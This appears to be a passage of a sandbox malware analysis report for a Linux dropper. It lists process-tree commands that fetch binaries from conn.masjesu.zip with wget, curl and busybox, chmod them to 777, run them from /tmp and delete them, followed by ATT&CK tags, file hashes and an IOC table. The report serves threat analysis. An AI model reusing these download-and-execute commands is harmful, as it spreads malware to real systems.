- /bin/rm
  rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:977
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - System Network Configuration Discovery
  PID:978
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:979
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - System Network Configuration Discovery
  PID:981
- /bin/chmod
  chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  ./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:984
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - System Network Configuration Discovery
  PID:985
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:986
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - System Network Configuration Discovery
  PID:988
- /bin/chmod
  chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  ./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Executes dropped EXE
  PID:990
- /bin/rm
  rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:991
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:992
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:993
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - System Network Configuration Discovery
  PID:995
- /bin/chmod
  chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  ./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Executes dropped EXE
  PID:997
- /bin/rm
  rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:998
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:999
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1000
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - System Network Configuration Discovery
  PID:1002
- /bin/chmod
  chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - File and Directory Permissions Modification
  PID:1003
- /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  ./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Executes dropped EXE
  PID:1004
- /bin/rm
  rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:1005
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - System Network Configuration Discovery
  PID:1006
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1007
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - System Network Configuration Discovery
  PID:1009
- /bin/chmod
  chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - File and Directory Permissions Modification
  PID:1010
- /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  ./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Executes dropped EXE
  PID:1011
- /bin/rm
  rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:1012
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - System Network Configuration Discovery
  PID:1013
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1014
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - System Network Configuration Discovery
  PID:1016
- /bin/chmod
  chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - File and Directory Permissions Modification
  PID:1017
- /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  ./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Executes dropped EXE
  PID:1018
- /bin/rm
  rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:1019

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	751	UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	758	j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	784	1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	817	Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	824	eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	839	Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	868	QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	875	0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	882	hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	892	WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	899	DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	906	7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	913	4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	920	6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	927	UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	934	j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	941	1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	948	Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	955	eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	962	Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	969	QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	976	0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	983	hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	990	WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	997	DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	1004	7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	1011	4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	1018	6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM